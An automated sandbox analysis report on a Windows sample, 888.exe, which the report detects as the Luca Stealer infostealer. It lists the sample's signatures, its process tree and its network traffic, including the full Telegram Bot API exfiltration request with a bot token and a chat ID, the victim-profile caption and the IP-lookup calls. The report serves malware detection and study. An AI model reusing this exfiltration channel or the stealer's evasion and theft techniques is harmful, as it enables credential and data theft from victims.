Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
888.exe

Overview

General Information

Sample name:888.exe
Analysis ID:1574586
MD5:b6e5859c20c608bf7e23a9b4f8b3b699
SHA1:302a43d218e5fd4e766d8ac439d04c5662956cc3
SHA256:bd5532a95156e366332a5ad57c97ca65a57816e702d3bf1216d4e09b899f3075
Tags:exeuser-lontze7
Infos:

Detection

Luca Stealer
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Luca Stealer
AI detected suspicious sample
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 888.exe (PID: 5752 cmdline: "C:\Users\user\Desktop\888.exe" MD5: B6E5859C20C608BF7E23A9B4F8B3B699)
    • powershell.exe (PID: 7056 cmdline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
888.exeJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2711187553.0000000000974000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
        00000000.00000002.2711187553.000000000099B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
          00000000.00000003.2710106623.000000000099B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
            00000000.00000002.2711570869.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
              00000000.00000003.2709905866.000000000099B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
                Click to see the 6 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.888.exe.f90000.0.unpackJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
                  0.2.888.exe.f90000.0.unpackJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

                    Sigma Signatures

                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\888.exe", ParentImage: C:\Users\user\Desktop\888.exe, ParentProcessId: 5752, ParentProcessName: 888.exe, ProcessCommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", ProcessId: 7056, ProcessName: powershell.exe

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for submitted file
                    Source: 888.exeReversingLabs: Detection: 52%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                    Machine Learning detection for sample
                    Source: 888.exeJoe Sandbox ML: detected
                    Source: 888.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49813 version: TLS 1.2
                    Source: 888.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Jump to behavior

                    Networking

                    barindex
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Source: global trafficHTTP traffic detected: POST /bot6144496200:AAG-IIb4TPBPT1INBnZWa7iLZBVaG67I2mE/sendDocument?chat_id=-1001562112668&caption=%3Ccode%3E%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20PGUZEPW%20(1280,%201024)%0AHWID:%208671303959770644%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\888.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0ATelegram:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookies:%20%3C/code%3E&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=e8be572a4f1ca459-17be1c6bd1e7ca5e-9d6aa1bcf33cfc16-07b6deb476f0c378content-length: 888104accept: */*host: api.telegram.org
                    Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
                    Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 108.181.61.49 108.181.61.49
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: ipwho.is
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
                    Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
                    Source: global trafficDNS traffic detected: DNS query: ipwho.is
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: unknownHTTP traffic detected: POST /bot6144496200:AAG-IIb4TPBPT1INBnZWa7iLZBVaG67I2mE/sendDocument?chat_id=-1001562112668&caption=%3Ccode%3E%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20PGUZEPW%20(1280,%201024)%0AHWID:%208671303959770644%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\888.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0ATelegram:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookies:%20%3C/code%3E&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=e8be572a4f1ca459-17be1c6bd1e7ca5e-9d6aa1bcf33cfc16-07b6deb476f0c378content-length: 888104accept: */*host: api.telegram.org
                    Source: 888.exe, 00000000.00000002.2710785781.00000000005E5000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ipwho.is/?output=json
                    Source: 888.exe, 00000000.00000002.2710785781.00000000005E5000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ipwho.is/?output=jsonF
                    Source: 888.exe, 00000000.00000002.2710785781.00000000005E5000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ipwho.is/?output=jsonFx
                    Source: 888.exeString found in binary or memory: http://ns.adobe.
                    Source: 888.exeString found in binary or memory: http://www.w3.or
                    Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: 888.exe, 00000000.00000002.2711121286.000000000094F000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.2710271153.000000000094F000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.2709905866.000000000094F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ipwhois.io/flags/us.svg
                    Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: 888.exeString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                    Source: 888.exeString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support0
                    Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49813 version: TLS 1.2
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A4CB10_3_009A4CB1
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_2_011A6F300_2_011A6F30
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_2_00FB13400_2_00FB1340
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_2_011BEB200_2_011BEB20
                    Source: 888.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 888.exeBinary string: }Failed to open \Device\Afd\Mio:
                    Source: 888.exeBinary string: N\Device\Afd\Mio
                    Source: 888.exeBinary string: Failed to open \Device\Afd\Mio:
                    Source: classification engineClassification label: mal84.troj.spyw.evad.winEXE@4/15@2/2
                    Source: C:\Users\user\Desktop\888.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.dbJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2820:120:WilError_03
                    Source: C:\Users\user\Desktop\888.exeFile created: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Jump to behavior
                    Source: 888.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\888.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
                    Source: C:\Users\user\Desktop\888.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 888.exe, 00000000.00000000.2075823579.0000000001339000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: 888.exe, 00000000.00000000.2075823579.0000000001339000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: 888.exe, 00000000.00000000.2075823579.0000000001339000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: 888.exe, 00000000.00000000.2075823579.0000000001339000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: 888.exe, 00000000.00000000.2075823579.0000000001339000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: 888.exe, 00000000.00000000.2075823579.0000000001339000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: 888.exe, 00000000.00000003.2574734106.0000000000998000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.2577856952.000000000099E000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.2575114257.0000000000999000.00000004.00000020.00020000.00000000.sdmp, Login Data.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: 888.exe, 00000000.00000000.2075823579.0000000001339000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: 888.exeReversingLabs: Detection: 52%
                    Source: unknownProcess created: C:\Users\user\Desktop\888.exe "C:\Users\user\Desktop\888.exe"
                    Source: C:\Users\user\Desktop\888.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\888.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeSection loaded: cryptnet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: 888.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: 888.exeStatic file information: File size 4885504 > 1048576
                    Source: 888.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x358200
                    Source: 888.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x130200
                    Source: 888.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: 888.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_3_009A1F2A push eax; ret 0_3_009A1F49

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Deletes itself after installation
                    Source: C:\Users\user\Desktop\888.exeFile deleted: c:\users\user\desktop\888.exeJump to behavior
                    Source: C:\Users\user\Desktop\888.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
